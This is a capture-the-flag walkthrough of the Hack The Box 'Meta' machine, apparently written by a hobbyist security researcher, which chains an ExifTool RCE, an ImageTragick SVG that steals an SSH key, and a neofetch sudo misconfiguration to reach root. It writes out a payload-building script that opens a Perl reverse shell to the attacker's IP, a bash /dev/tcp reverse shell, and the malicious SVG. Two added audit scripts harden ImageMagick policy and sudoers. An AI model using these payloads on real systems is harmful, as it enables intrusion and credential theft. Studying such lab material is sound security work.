Hack-The-Box-walkthrough[meta]

Introduction

OS: Linux
Difficulty: Medium
Points: 30
Release: 22 Jan 2022
IP: 10.10.11.140


Enumeration

NMAP

┌──(root💀kali)-[~/hackthebox/machine/meta]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.140
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 is our only attack surface, so let’s start there. Before the page even loads, we’re redirected to:

http://artcorp.htb/

Let’s add that to /etc/hosts and continue.

We don’t have a great deal available to us. We can start brute-forcing directories and subdomains. We eventually find:

dev01.artcorp.htb

We seem to have file upload:

http://dev01.artcorp.htb/metaview/

We don’t have a great deal of other information. Let’s try capturing requests and seeing where that takes us. We get an interesting response from the metaview upload:

<div class="mt-3" id="output_data">
<pre>File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Image Width : 1920
Image Height : 1440
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
</pre>
</div>

Foothold

The output looks awfully similar to exiftool’s, suggesting potential exploits may be available to us via the file upload. We don’t have a specific version, but we can try using relevant PoCs:

  • A case study on: CVE-2021-22204 – Exiftool RCE

We’ll start by getting the requirements for the exploit:

  • CVE-2021-22204-exiftool

This repo has a script that allows us to automatically create payloads to get a reverse shell. We need to start by editing the IP and port variables:

#!/bin/env python3

import base64
import subprocess

ip = '10.10.14.8'
port = '9001'

payload = b"(metadata \"\c${use MIME::Base64;eval(decode_base64('"


payload = payload + base64.b64encode( f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({port},inet_aton('{ip}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};".encode() )

payload = payload + b"'))};\")"


payload_file = open('payload', 'w')
payload_file.write(payload.decode('utf-8'))
payload_file.close()


subprocess.run(['bzz', 'payload', 'payload.bzz'])
subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])
subprocess.run(['exiftool', '-config', 'configfile', '-HasselbladExif<=exploit.djvu', 'image.jpg'])

We run the script using:

python3 exploit.py

┌──(root💀kali)-[~/CVE-2021-22204-exiftool]
└─# ls
configfile exploit.djvu exploit.py image.jpg image.jpg_original lab payload payload.bzz README.md

After uploading the image to the website, we get a reverse shell:

┌──(root💀kali)-[~/hackthebox/machine/meta]
└─# nc -lvp 9001 130 ⨯
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.11.140.
Ncat: Connection from 10.10.11.140:54114.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 3: python: not found
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
bash-5.0$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-5.0$ cd /home
cd /home
bash-5.0$ ls
ls
thomas
bash-5.0$ cd thomas
cd thomas
bash-5.0$ ls
ls
user.txt
bash-5.0$ cat user.txt
cat user.txt
cat: user.txt: Permission denied

User own

We have a user called thomas that we need to try to exploit. There is a cron job that runs an image conversion script. Most of the binaries used for this are found in /usr/local/bin, such as convert. We also have a script containing the following:

#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify

We can do a little research and try finding a relevant exploit:

  • ImageMagick 7.0.1-0 / 6.9.3-9 - ‘ImageTragick’ Multiple Vulnerabilities

We can’t get a reverse shell but we can very easily grab Thomas’ SSH key. We start by creating a file in /tmp:

  • Putting it in /tmp instead of directly in the /var/ directory so we can re-use it if it fails.

  • poc.svg

bash-5.0$ echo "[base64 of poc.svg omitted]" |base64 -d > poc.svg
bash-5.0$ ls
ls
poc.svg pspy64
bash-5.0$ cat poc.svg
cat poc.svg
<image authenticate='ff" `echo $(cat ~/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>

We copy our poc file into:

cp poc.svg /var/www/dev01.artcorp.htb/convert_images/poc.svg

We wait for the cron job to run and grab the key then use it to SSH as thomas:

bash-5.0$ pwd
pwd
/dev/shm
bash-5.0$ ls
ls
id_rsa
bash-5.0$ cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----

┌──(root💀kali)-[~/hackthebox/machine/meta]
└─# chmod 600 id_rsa

┌──(root💀kali)-[~/hackthebox/machine/meta]
└─# ssh thomas@artcorp.htb -i id_rsa
Linux meta 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jan 23 07:54:28 2022 from 10.10.14.8
-bash-5.0$ id
uid=1000(thomas) gid=1000(thomas) groups=1000(thomas)
-bash-5.0$ whoami
thomas
-bash-5.0$ cat user.txt
997f481194ea9c17c5d4a015cfca3b7c
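The ImageTragick trick above works because the `msl:` coder (and the `@file` indirect-read syntax) are still enabled in ImageMagick’s policy.xml. The following is an added audit script, not part of the original walkthrough or of ImageMagick, that checks a policy.xml for the usual coder denies; the two policy samples are constructed, not taken from the box.

```python
import xml.etree.ElementTree as ET

# Coders that ImageTragick-style payloads lean on: "msl:" (used by the poc above),
# "text:"/"pdf:" style reads, and the URL/EPHEMERAL fetchers. Denying them in
# policy.xml is the usual hardening next to upgrading ImageMagick itself.
RISKY_CODERS = ("EPHEMERAL", "URL", "HTTPS", "HTTP", "MVG", "MSL", "TEXT",
                "SHOW", "WIN", "PLT", "PS", "PS2", "PS3", "EPS", "PDF", "XPS")

def denied_coders(root):
    """Collect coder patterns with rights="none". A pattern is either a single
    name or a brace list such as {PS,PS2,EPS}."""
    denied = set()
    for pol in root.iter("policy"):
        if pol.get("domain") != "coder" or pol.get("rights", "").lower() != "none":
            continue
        raw = pol.get("pattern", "").strip().strip("{}")
        denied.update(n.strip().upper() for n in raw.split(",") if n.strip())
    return denied

def audit_policy(policy_xml):
    """Return findings an admin should fix: risky coders still allowed, and a
    missing '@*' path rule (which blocks the @file indirect-read syntax)."""
    root = ET.fromstring(policy_xml)
    denied = denied_coders(root)
    findings = [f"coder {c} not denied" for c in RISKY_CODERS if c not in denied]
    at_rule = any(pol.get("domain") == "path" and pol.get("pattern") == "@*"
                  and pol.get("rights", "").lower() == "none"
                  for pol in root.iter("policy"))
    if not at_rule:
        findings.append("path @* not denied")
    return findings

# Constructed samples (not from the box): a permissive policy and a hardened one.
WEAK_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
</policymap>"""

HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="{EPHEMERAL,URL,HTTPS,HTTP,MVG,MSL,TEXT,SHOW,WIN,PLT}" />
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS}" />
  <policy domain="path" rights="none" pattern="@*" />
</policymap>"""

if __name__ == "__main__":
    for name, xml in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, audit_policy(xml) or "OK")
```

Point it at the real file with `audit_policy(open("/etc/ImageMagick-6/policy.xml").read())` (path varies by distribution and major version).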

Root own

We have a /etc/sudoers entry that allows us to run neofetch:

-bash-5.0$ sudo -l
Matching Defaults entries for thomas on meta:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:
(root) NOPASSWD: /usr/bin/neofetch \"\"

This is pretty easy to exploit: we search GTFOBins for neofetch and find this:

  • gtfobins - neofetch

We have an interesting entry regarding env_keep. We do have a neofetch config in our home dir, but this isn’t touched.

-bash-5.0$ pwd
/home/thomas/.config/neofetch
-bash-5.0$ ls
config.conf

We could edit this config to try to set the LFILE environment variable, but due to how this is set up in the sudoers entry, we can’t use it. I had a different idea. We can set our own config path to the one in ~/.config using:

-bash-5.0$ export XDG_CONFIG_HOME="$HOME/.config"

We change our current neofetch config to include a reverse shell:

-bash-5.0$ echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.8/4444 0>&1'" > /home/thomas/.config/neofetch/config.conf
-bash-5.0$ sudo /usr/bin/neofetch \"\"

We run neofetch as per the sudoer entry and catch the shell with netcat:

┌──(root💀kali)-[~/hackthebox/machine/meta]
└─# nc -lvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.140.
Ncat: Connection from 10.10.11.140:51960.
root@meta:/home/thomas/.config/neofetch# id
id
uid=0(root) gid=0(root) groups=0(root)
root@meta:/home/thomas/.config/neofetch# whoami
whoami
root
root@meta:/home/thomas/.config/neofetch# cd
cd
root@meta:~# cat root.txt
cat root.txt
67a535da514ea5d296eed29741c96d96
root@meta:~# cat /etc/shadow | grep root
cat /etc/shadow | grep root
root:$6$C2RdQ0RpQ545cx/2$TMbXaoMwVs7XQVOwEwAnzcUVrIR5CdpVaM3Aoml8p9PWQWvxbrGrh/Y6d2.OuKlSHVsNVS0mJwSoGl.q8Pbug0:18996:0:99999:7:::
root@meta:~#
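The root path above is really a sudoers misconfiguration: `env_keep+=XDG_CONFIG_HOME` lets the caller choose which config neofetch loads as root. Below is an added audit helper, not part of the original walkthrough, that parses `sudo -l` output and flags NOPASSWD rules combined with user-controllable kept variables; the `SAMPLE` text is constructed to mirror the output shown above.

```python
import re

# Environment variables that let the invoking user steer where a privileged
# program finds its config or code; XDG_CONFIG_HOME is the one kept on this box.
DANGEROUS_ENV = {"XDG_CONFIG_HOME", "HOME", "LD_PRELOAD", "LD_LIBRARY_PATH",
                 "PERL5LIB", "PYTHONPATH", "BASH_ENV", "ENV"}

ENV_KEEP_RE = re.compile(r'env_keep\+?=(?:"([^"]*)"|(\S+))')
RULE_RE = re.compile(r"\((.+?)\)\s+((?:[A-Z]+:\s*)*)(.+)")

def parse_sudo_l(output):
    """Split `sudo -l` output into the set of kept variables and a list of
    (runas, tags, command) rules."""
    kept, rules = set(), []
    for line in output.splitlines():
        line = line.strip()
        for m in ENV_KEEP_RE.finditer(line):
            kept.update((m.group(1) or m.group(2)).rstrip(",").split())
        m = RULE_RE.match(line)
        if m:
            tags = {t.strip() for t in m.group(2).split(":") if t.strip()}
            rules.append((m.group(1), tags, m.group(3).strip()))
    return kept, rules

def audit_sudo(output):
    """Flag password-less rules that run while a user-controlled variable is
    preserved; the fix is to drop the env_keep entry or call a fixed wrapper."""
    kept, rules = parse_sudo_l(output)
    risky = sorted(kept & DANGEROUS_ENV)
    return [f"{cmd} as {runas} without password while {', '.join(risky)} is kept"
            for runas, tags, cmd in rules if "NOPASSWD" in tags and risky]

# Constructed sample mirroring the `sudo -l` output from the box.
SAMPLE = r"""Matching Defaults entries for thomas on meta:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:
    (root) NOPASSWD: /usr/bin/neofetch \"\"
"""

if __name__ == "__main__":
    for finding in audit_sudo(SAMPLE):
        print(finding)
```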

Summary of knowledge

  • CVE-2021-22204 – Exiftool RCE
  • ImageMagick 7.0.1-0 / 6.9.3-9 - ‘ImageTragick’ Multiple Vulnerabilities to read SSH key
  • gtfobins - neofetch privilege escalation

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…